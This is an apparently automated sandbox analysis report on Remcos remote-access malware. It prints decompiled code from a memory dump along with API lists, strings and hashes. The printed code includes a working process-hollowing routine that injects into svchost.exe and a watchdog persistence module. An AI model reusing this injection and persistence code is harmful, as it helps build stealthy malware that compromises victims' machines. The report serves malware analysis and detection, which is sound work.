									__eflags =  *((intOrPtr*)(E00741F95(E00741E49(_t471, _t450, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x7aba75 = 1;
										_t185 = E00741F95(E00741E49(_t471, _t450, __eflags, 0x25));
										_t187 = E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x26));
										_t450 =  *_t185;
										E00741EFA(0x7ac0e0,  *_t185, _t185, E0075800F( &_v780,  *_t185, _t187));
										E00741EF0();
										__eflags = 0;
										CreateThread(0, 0, E00741BCD, 0, 0, 0);
										_t471 = 0x7ac578;
									}
									__eflags =  *((intOrPtr*)(E00741F95(E00741E49(_t471, _t450, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t471 = E00741F95(E00741E49(_t471, _t450, __eflags, 0x2c));
										_t182 = E00776769(_t180, E00741F95(E00741E49(0x7ac578, _t450, __eflags, 0x2d)));
										__eflags =  *_t471;
										_t450 = _t182;
										__eflags =  *_t471 != 0;
										E0074A679(_t182);
									}
									E00741EFA(0x7ac584, _t450, _t471, E00756D9E( &_v772, _t461, __eflags));
									_t360 =  &_v776;
									E00741EF0();
									_t163 =  *0x7abd14; // 0x0
									_t269 = 0;
									__eflags = _t163;
									if(_t163 != 0) {
										 *_t163(0);
									}
									CreateThread(_t269, _t269, E0074D0B5, _t269, _t269, _t269);
									__eflags =  *0x7abd4e;
									if( *0x7abd4e != 0) {
										CreateThread(_t269, _t269, E0074FAC7, _t269, _t269, _t269);
									}
									__eflags =  *0x7abd4f;
									if( *0x7abd4f != 0) {
										CreateThread(_t269, _t269, E0074FFE5, _t269, _t269, _t269);
									}
									_t165 =  *0x7aa9d0; // 0x2
									_t166 = _t165 - _t269;
									__eflags = _t166;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t166 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t224 = E00741E49(0x7ac578, "0", __eflags, 0xd);
									_t506 = _t501 - 0x18;
									_t449 = _t224;
									E007572DA(_t506, _t224);
									_t226 = E0074CE44(__eflags);
									_t501 = _t506 + 0x18;
									__eflags = _t226 - _t272;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t272 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t265 = E00750885(E00741F95(0x7ac518), "WD",  &_v780);
						__eflags = _t265;
						if(_t265 != 0) {
							E00750CE2(E00741F95(0x7ac518), __eflags, "WD");
							E0074FD95();
							L71:
							_push("User");
							L72:
							E007475C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00742084(_t269,  &_v776));
							E00742084(_t269, _t497 - 4, "[Info]");
							E00756C80(_t269, _t461);
							_t360 =  &_v784;
							E00741FC7();
							L73:
							E00751929();
							asm("int3");
							_push(_t471);
							_t481 = _t360 + 0x68;
							E0074D515(_t481, __eflags);
							_t284 = _t481;
							 *_t284 = 0x7a0788;
							 *_t284 = 0x7a0744;
							return E007704F6(_t284);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0074D544( &_v700, __edx, __eflags, "license_code.txt", 2);
							__ecx = 0x7ac578;
							__ecx = E00741E49(0x7ac578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = E0074E8BB( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0074D4F5( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							E00741FC7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t97;
						}
					}
				}
			}

0x0074c2be
0x0074c2d4
0x0074c2d9
0x0074c2dc
0x0074c2e1
0x0074c2eb
0x0074c2f0
0x0074c2fa
0x0074c303
0x0074c308
0x0074c30c
0x0074c315
0x0074c31a
0x0074c320
0x0074c387
0x0074c387
0x0074c3a5
0x0074c3a8
0x0074c3ca
0x0074c3d0
0x0074c3d8
0x0074c3e1
0x0074c3ea
0x0074c3f9
0x0074c3fe
0x0074c405
0x0074c416
0x0074c418
0x0074c41f
0x0074c426
0x0074c42b
0x0074c42d
0x0074c434
0x0074c43a
0x0074c462
0x0074c46d
0x0074c477
0x0074c479
0x0074c47b
0x0074c483
0x0074c48a
0x0074c48a
0x0074c4a7
0x0074c4a9
0x0074c4b0
0x0074c4b2
0x0074c4bc
0x0074c4be
0x0074c4c3
0x0074c4d5
0x0074c4dc
0x0074c4e4
0x0074c4e6
0x0074c4e9
0x0074c4ef
0x0074c4f5
0x0074c4fa
0x0074c87d
0x0074c881
0x0074c886
0x00000000
0x0074c500
0x0074c500
0x0074c510
0x0074c516
0x0074c51b
0x0074c526
0x0074c52b
0x0074c534
0x0074c539
0x0074c544
0x0074c54d
0x0074c552
0x0074c55b
0x0074c564
0x0074c55d
0x0074c55d
0x0074c55d
0x0074c569
0x0074c56e
0x0074c573
0x0074c575
0x0074c579
0x0074c579
0x0074c57e
0x0074c583
0x0074c587
0x0074c592
0x0074c599
0x0074c59c
0x0074c59e
0x0074c5a4
0x0074c5a6
0x0074c5ac
0x0074c5d0
0x0074c5d2
0x0074c5d7
0x0074c5d8
0x0074c5da
0x0074c5dc
0x0074c5dc
0x0074c5ae
0x0074c5ae
0x0074c5af
0x0074c5b5
0x0074c5b8
0x0074c5ba
0x0074c5ba
0x0074c5b8
0x0074c5ac
0x0074c5a4
0x0074c59c
0x0074c5f1
0x0074c5f4
0x0074c5f6
0x0074c5f6
0x0074c611
0x0074c62a
0x0074c62d
0x0074c644
0x0074c647
0x0074c65e
0x0074c661
0x0074c674
0x0074c677
0x0074c684
0x0074c689
0x0074c689
0x0074c68c
0x0074c68c
0x0074c68f
0x0074c692
0x0074c692
0x0074c697
0x0074c69b
0x0074c6a8
0x0074c6bd
0x0074c6c2
0x0074c6d5
0x0074c6de
0x0074c6e3
0x0074c6e3
0x0074c69b
0x0074c6e8
0x0074c6ec
0x0074c89c
0x0074c8ab
0x0074c8b3
0x0074c8d1
0x0074c8d3
0x0074c8d8
0x0074c8e8
0x0074c8ed
0x00000000
0x0074c6f2
0x0074c6f2
0x0074c6f9
0x0074c78f
0x0074c6ff
0x0074c70a
0x0074c71c
0x0074c731
0x0074c736
0x0074c73e
0x0074c744
0x0074c75c
0x0074c776
0x0074c77d
0x0074c780
0x0074c781
0x0074c781
0x0074c799
0x0074c7a3
0x0074c7ab
0x0074c7ad
0x0074c7ae
0x0074c7b7
0x0074c7ba
0x0074c7bc
0x0074c7ce
0x0074c7be
0x0074c7c4
0x0074c7c9
0x0074c7c9
0x0074c7d5
0x0074c7de
0x0074c7de
0x0074c7e0
0x0074c7e1
0x0074c7e1
0x0074c7e4
0x0074c7e8
0x0074c7ea
0x0074c7ea
0x0074c7ef
0x0074c7f7
0x0074c7ff
0x0074c80a
0x0074c829
0x0074c82f
0x0074c834
0x0074c837
0x0074c840
0x0074c845
0x0074c851
0x0074c853
0x0074c8f2
0x0074c8f2
0x0074c8fe
0x0074c903
0x0074c909
0x0074c90e
0x0074c91d
0x0074c91f
0x0074c924
0x0074c938
0x0074c943
0x0074c949
0x0074c94b
0x0074c951
0x0074c953
0x0074c955
0x0074c955
0x00000000
0x0074c955
0x0074c94d
0x0074c94d
0x0074c957
0x0074c957
0x0074c95c
0x0074c968
0x0074c968
0x0074c975
0x0074c987
0x0074c999
0x0074c99e
0x0074c9a3
0x0074c9c0
0x0074c9d2
0x0074c9f1
0x0074ca09
0x0074ca0b
0x0074ca54
0x0074ca0d
0x0074ca0f
0x0074ca16
0x0074ca22
0x0074ca29
0x0074ca2b
0x0074ca30
0x0074ca36
0x0074ca48
0x0074ca4b
0x0074ca4d
0x0074ca4d
0x0074ca6a
0x0074ca6c
0x0074ca70
0x0074ca77
0x0074ca81
0x0074ca88
0x0074ca8a
0x0074ca8f
0x0074ca95
0x0074caa1
0x0074caa4
0x0074caa6
0x0074caa6
0x0074cabb
0x0074cabd
0x0074cac3
0x0074cad0
0x0074cae5
0x0074caea
0x0074cafd
0x0074cb06
0x0074cb0b
0x0074cb17
0x0074cb19
0x0074cb19
0x0074cb2e
0x0074cb30
0x0074cb49
0x0074cb58
0x0074cb5d
0x0074cb60
0x0074cb63
0x0074cb66
0x0074cb66
0x0074cb7a
0x0074cb7f
0x0074cb83
0x0074cb88
0x0074cb8d
0x0074cb8f
0x0074cb91
0x0074cb94
0x0074cb94
0x0074cba0
0x0074cba2
0x0074cba9
0x0074cbb5
0x0074cbb5
0x0074cbb7
0x0074cbbe
0x0074cbca
0x0074cbca
0x0074cbcc
0x0074cbd1
0x0074cbd1
0x0074cbd3
0x00000000
0x0074cbd5
0x0074cbd5
0x0074cbd8
0x0074cbda
0x00000000
0x0074cbda
0x0074cbd8
0x00000000
0x0074c859
0x0074c85d
0x0074c862
0x0074c865
0x0074c869
0x0074c86e
0x0074c873
0x0074c876
0x0074c878
0x00000000
0x0074c87a
0x0074c87c
0x00000000
0x0074c87c
0x0074c878
0x0074c853
0x0074c6ec
0x0074c43c
0x0074c440
0x0074c453
0x0074c45a
0x0074c45c
0x0074cbef
0x0074cbf9
0x0074cbfe
0x0074cbfe
0x0074cc03
0x0074cc17
0x0074cc26
0x0074cc2b
0x0074cc33
0x0074cc37
0x0074cc3c
0x0074cc3c
0x0074cc41
0x0074cc42
0x0074cc43
0x0074cc48
0x0074cc4d
0x0074e032
0x0074c177
0x0074c183
0x00000000
0x00000000
0x00000000
0x0074c45c
0x0074c322
0x0074c322
0x0074c326
0x00000000
0x0074c328
0x0074c328
0x0074c32c
0x0074c32e
0x00000000
0x0074c330
0x0074c330
0x0074c331
0x0074c339
0x0074c33d
0x0074c344
0x0074c34e
0x0074c355
0x0074c357
0x0074c35b
0x0074c360
0x0074c364
0x0074c369
0x0074c36d
0x0074c372
0x0074c37b
0x0074c37d
0x0074c37d
0x0074c37e
0x0074c384
0x0074c384
0x0074c32e
0x0074c326

APIs

OpenMutexA.KERNEL32 ref: 0074C471
WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0074C483
CloseHandle.KERNEL32(00000000), ref: 0074C48A
CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0074C4E9
GetLastError.KERNEL32 ref: 0074C4EF
GetModuleFileNameW.KERNEL32(00000000,007ABB08,00000104), ref: 0074C510

Part of subcall function 0074E8BB: __EH_prolog.LIBCMT ref: 0074E8C0

Strings

(64 bit), xrefs: 0074C55D
Remcos_Mutex_Inj, xrefs: 0074C462
[Info], xrefs: 0074CC21
Access level: , xrefs: 0074CC0F
license_code.txt, xrefs: 0074C334
(32 bit), xrefs: 0074C564
exepath, xrefs: 0074C81D, 0074C8C7
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0074C521
ProductName, xrefs: 0074C51C
Exe, xrefs: 0074C3EF
origmsc, xrefs: 0074C5C1
Inj, xrefs: 0074C494, 0074C49F, 0074C4B4
licence, xrefs: 0074C90E
User, xrefs: 0074CBFE
Software\, xrefs: 0074C3B5
Administrator, xrefs: 0074CBDA

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Exe$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
API String ID: 1247502528-2513554630
Opcode ID: 598a5279ada0e75b3ab8f866b0a23ce3b8e235a70aa2e167de83890c7a52d38e
Instruction ID: 16ed777f92c2ca2f3ee3bf521df295b57d2c35748f7d33c32af11898b5cf1b76
Opcode Fuzzy Hash: 598a5279ada0e75b3ab8f866b0a23ce3b8e235a70aa2e167de83890c7a52d38e
Instruction Fuzzy Hash: 7732D790B45350EBDB1AB7705C2FB7E29898BC6700F94093AF541AB2D3EF6C5D868361

Uniqueness

Uniqueness Score: -1.00%

Function 00750885, Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00750885(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12);
				return RegCloseKey(_v8) & 0xffffff00 | _t18 == 0x00000000;
			}

0x0075088d
0x0075088e
0x00750891
0x007508a5
0x007508ad
0x00000000
0x007508dc
0x007508c3
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 007508A5
RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 007508C3
RegCloseKey.ADVAPI32(?), ref: 007508CE

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 9c551670ad6f5bccfaaf7f2264a81e30767596394b984149d0f83b68cf5c94e9
Instruction ID: d3544b9ec0dfc31a47956495bff898a56a0ab402b36938ebd6b1b7d70343fea0
Opcode Fuzzy Hash: 9c551670ad6f5bccfaaf7f2264a81e30767596394b984149d0f83b68cf5c94e9
Instruction Fuzzy Hash: F6F06D7690020CBFDF109FA49C05FEEBBBCEB04701F1081A2FE04E6150E2745B149B94

Uniqueness

Uniqueness Score: -1.00%

Function 006B0000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON

Download Yara Rule

APIs

RtlExitUserThread.NTDLL(00000000), ref: 006B0023

Memory Dump Source

Source File: 0000001C.00000002.416194152.00000000006B0000.00000040.00000001.sdmp, Offset: 006B0000, based on PE: false

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00730000, Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON

Download Yara Rule

APIs

RtlExitUserThread.NTDLL(00000000), ref: 00730023

Memory Dump Source

Source File: 0000001C.00000002.416234464.0000000000730000.00000040.00000001.sdmp, Offset: 00730000, based on PE: false

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1

Uniqueness

Uniqueness Score: -1.00%

Function 006D0000, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.416220039.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
Instruction ID: 18b5e61e04c7bcae5a7a9f8a09946595db22e2a0f492063f86ebefdf2a899b08
Opcode Fuzzy Hash: a8f87fc558e2f538fd351bdfc49e2c6aa18e45c6a6d2c8ec1415aa36aaa266a9
Instruction Fuzzy Hash: 33D01275914208EFDB04CF54D84589EBBF5EB44320F20C165E914973A0E731AE509A44

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0074FAC7, Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0074FAC7(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(E00750BB0(0x7ac518, E00741F95(0x7ac518), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E007420D5(0x7ac518,  &_v100);
						E007579DC(E00741EEB(0x7ac500),  &_v100);
						E00741F6D(0x7ac518,  &_v124);
						__eflags = E00757614( &_v124);
						if(__eflags != 0) {
							_t35 = E0074427F(0x7ac518,  &_v76, L"\\SysWOW64");
							E00741EFA( &_v132, _t37, _t142, E00743030( &_v36, E0074427F(0x7ac518,  &_v56, E0077987F(0x7ac518,  &_v76, __eflags, L"WinDir")), _t35));
							E00741EF0();
							E00741EF0();
						} else {
							_t61 = E0074427F(0x7ac518,  &_v28, L"\\system32");
							E00741EFA( &_v132, _t63, _t142, E00743030( &_v84, E0074427F(0x7ac518,  &_v56, E0077987F(0x7ac518,  &_v28, __eflags, L"WinDir")), _t61));
							E00741EF0();
							E00741EF0();
						}
						E00741EF0();
						E0074766C(0x7ac518,  &_v124, 0, L"\\svchost.exe");
						_t143 = E00741F95( &_v104);
						_t46 = E0075412B(E00741EEB( &_v128), _t143, 0x7abd50);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00742084(0x7ac518, _t107, "Watchdog module activated");
							E00742084(0x7ac518, _t150 - 0x18, "[Info]");
							E00756C80(0x7ac518, 0);
							Sleep(0x7d0);
							_t112 =  *0x7abd58; // 0x0
							goto L13;
						}
						E00742084(0x7ac518, _t107, "Watchdog launch failed!");
						E00742084(0x7ac518, _t150 - 0x18, "[ERROR]");
						E00756C80(0x7ac518, 0);
						CloseHandle( *0x7abd60);
						E00741EF0();
						E00741FC7();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E00742084(0x7ac518, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E00742084(0x7ac518, _t155 - 0x18, "[Info]");
						E00756C80(0x7ac518, 0);
						E00742084(0x7ac518, _t156 + 0x18, "Watchdog module activated");
						E00742084(0x7ac518, _t156 + 0x18 - 0x18, "[Info]");
						E00756C80(0x7ac518, 0);
						CreateThread(0, 0, E007500F9, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E00750885(E00741F95(0x7ac518), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x7abd50 = OpenProcess(0x1fffff, 0, _v132);
							E00750CE2(E00741F95(0x7ac518), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x7abd4e;
							if(__eflags != 0) {
								E0074FAC7(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}

0x0074facd
0x0074fad1
0x0074fad3
0x0074faf6
0x0074fb0d
0x0074fb13
0x0074fb15
0x0074fba4
0x0074fbb9
0x0074fbc2
0x0074fbcc
0x0074fbce
0x0074fc2b
0x0074fc57
0x0074fc60
0x0074fc69
0x0074fbd0
0x0074fbd9
0x0074fc05
0x0074fc0e
0x0074fc17
0x0074fc1c
0x0074fc72
0x0074fc80
0x0074fc97
0x0074fca2
0x0074fca8
0x0074fcab
0x0074fcad
0x0074fcaf
0x0074fcb6
0x0074fcc5
0x0074fcca
0x0074fcd7
0x0074fcdd
0x00000000
0x0074fcdd
0x0074fcea
0x0074fcf9
0x0074fcfe
0x0074fd0c
0x0074fd16
0x0074fd1f
0x0074fd24
0x0074fd26
0x0074fb1b
0x0074fb1c
0x0074fb22
0x0074fb2c
0x0074fb31
0x0074fb3c
0x0074fb41
0x0074fb50
0x0074fb5b
0x0074fb60
0x0074fb72
0x0074fb7c
0x0074fb8c
0x0074fb93
0x0074fb95
0x00000000
0x0074fb9b
0x0074fd43
0x0074fd4f
0x0074fd55
0x0074fd59
0x0074fd59
0x0074fd5e
0x0074fd5f
0x0074fd60
0x0074fd61
0x0074fd63
0x0074fd71
0x0074fd76
0x0074fd7d
0x0074fd83
0x0074fd8a
0x0074fd8e
0x0074fd8e
0x00000000
0x0074fd8a
0x00000000
0x0074fb95
0x0074faf8
0x0074faf8
0x0074fafa
0x0074fd2d
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0074FAD3

Part of subcall function 00750BB0: RegCreateKeyA.ADVAPI32(80000001,00000000,0079F6BC), ref: 00750BBE
Part of subcall function 00750BB0: RegSetValueExA.ADVAPI32(0079F6BC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0074A669,0079FEF8,00000001,000000AF,0079F6BC), ref: 00750BD9
Part of subcall function 00750BB0: RegCloseKey.ADVAPI32(0079F6BC,?,?,?,0074A669,0079FEF8,00000001,000000AF,0079F6BC), ref: 00750BE4

OpenMutexA.KERNEL32 ref: 0074FB0D
CloseHandle.KERNEL32(00000000), ref: 0074FB1C
CreateThread.KERNEL32 ref: 0074FB72
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0074FD3A

Strings

Watchdog module activated, xrefs: 0074FB4B, 0074FCB1
Mutex_RemWatchdog, xrefs: 0074FB00
[Info], xrefs: 0074FB34, 0074FB3B, 0074FB5A, 0074FCC0
\svchost.exe, xrefs: 0074FC77
WDH, xrefs: 0074FB7C, 0074FB82, 0074FD40
[ERROR], xrefs: 0074FCF4
\system32, xrefs: 0074FBD0
Remcos restarted by watchdog!, xrefs: 0074FB27
Watchdog launch failed!, xrefs: 0074FCE5
\SysWOW64, xrefs: 0074FC22
WinDir, xrefs: 0074FBDF, 0074FC31

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
API String ID: 3018269243-3797382479
Opcode ID: 8b6147feb0e7a34f7c86fb49196e18f95bb0a08c01cff5e3edcf7fc828d8790c
Instruction ID: a46a36dfc0035f883465f07e81e4335ef38b835030e6da93e4cd00b75d9f953f
Opcode Fuzzy Hash: 8b6147feb0e7a34f7c86fb49196e18f95bb0a08c01cff5e3edcf7fc828d8790c
Instruction Fuzzy Hash: 9051C271614200EBC608BB70DC5F8AF77A5AED2711FD0092DF942571E3EF6C994AC6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0075412B, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0075412B(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				void* _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t58;
				void _t72;
				void* _t73;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				void* _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *__edx == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						E00771F00(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						CloseHandle(_v92.hStdInput);
						CloseHandle(_v92.hStdOutput);
						CloseHandle(_v92.hStdError);
						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t14 =  &(_t116->hThread); // 0xffffdcf2
						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							CloseHandle(_t116->hProcess);
							_t50 =  &(_t116->hThread); // 0xffffdcf2
							CloseHandle( *_t50);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						} else {
							_t72 = _v8;
							if(_t72 ==  *(_t95 + 0x34)) {
								 *0x7abd24(_t116->hProcess, _t72);
							}
							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
							_v24 = _t73;
							if(_t73 == 0) {
								goto L20;
							} else {
								_t113 = _v16;
								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
									goto L20;
								}
								_v12 = _v12 & 0x00000000;
								if(0 >=  *(_t95 + 6)) {
									L14:
									_t98 = _t95 + 0x34;
									_t114 = _v20;
									if(_v8 ==  *_t98) {
										L17:
										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
										_t48 =  &(_t116->hThread); // 0xffffdcf2
										if(SetThreadContext( *_t48, _t114) == 0) {
											goto L20;
										}
										_t49 =  &(_t116->hThread); // 0xffffdcf2
										if(ResumeThread( *_t49) == 0xffffffff) {
											goto L20;
										}
										_t58 = 1;
										goto L22;
									}
									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
									if(_t83 != 0) {
										goto L17;
									}
									TerminateProcess(_t116->hProcess, _t83);
									goto L21;
								}
								_t104 = 0;
								_v16 = 0;
								do {
									_t28 = _t113 + 0x3c; // 0x83ffc983
									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
									_t37 =  &_v16; // 0x75433b
									_t102 = _v12 + 1;
									_t104 =  *_t37 + 0x28;
									_v12 = _t102;
									_v16 = _t104;
								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
								goto L14;
							}
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}

0x00754131
0x0075413a
0x0075413d
0x00754143
0x00754150
0x00754158
0x00754162
0x0075416b
0x00754170
0x0075417a
0x0075417c
0x0075417d
0x0075417e
0x00754198
0x00754322
0x00754322
0x00754324
0x00754326
0x00000000
0x00754326
0x007541a7
0x007541ac
0x007541b1
0x007541c4
0x007541c7
0x007541ca
0x007541d0
0x007541db
0x00754301
0x00754305
0x00754313
0x00754315
0x00754318
0x0075431e
0x0075431f
0x00754320
0x00754321
0x00000000
0x00754203
0x00754203
0x00754209
0x0075420e
0x0075420e
0x00754223
0x00754229
0x0075422e
0x00000000
0x00754234
0x00754234
0x00754248
0x00000000
0x00000000
0x0075424e
0x00754258
0x007542a2
0x007542a5
0x007542a8
0x007542ad
0x007542d5
0x007542dc
0x007542e2
0x007542ed
0x00000000
0x00000000
0x007542ef
0x007542fb
0x00000000
0x00000000
0x007542fd
0x00000000
0x007542fd
0x007542c0
0x007542c8
0x00000000
0x00000000
0x007542cd
0x00000000
0x007542cd
0x0075425a
0x0075425c
0x0075425f
0x0075425f
0x00754284
0x0075428d
0x00754290
0x00754295
0x00754298
0x0075429b
0x0075429e
0x00000000
0x0075425f
0x0075422e
0x007541db
0x0075415a
0x00000000
0x0075415a
0x00000000

Strings

;Cu, xrefs: 0075428D

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ;Cu
API String ID: 0-742672918
Opcode ID: 4a0ecdc103eaf0599c16ad51cd874516491e1e01400dabd42b1375ec64feaaf7
